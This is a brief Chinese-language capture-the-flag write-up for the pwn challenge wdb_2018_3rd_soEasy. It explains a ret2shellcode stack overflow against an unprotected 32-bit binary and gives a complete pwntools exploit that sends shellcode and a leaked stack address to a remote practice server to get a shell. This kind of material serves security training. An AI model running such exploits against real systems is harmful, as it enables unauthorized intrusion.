wdb_2018_3rd_soEasy
- 例行检查,32位程序,没有开启任何保护,估计是ret2shellcode
- 32位ida载入
一开始输buf在栈上的地址,然后存在栈溢出,利用pwntools自动生成shellcode,之后劫持返回地址到buf执行shellcode
exp
from pwn import *
context.arch="i386"
p=remote("node3.buuoj.cn",25832)
p.recvuntil("Hei,give you a gift->")
buf_addr=int(p.recv(10),16)
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(0x48+4,'\x00')+p32(buf_addr)
p.sendline(payload)
p.interactive()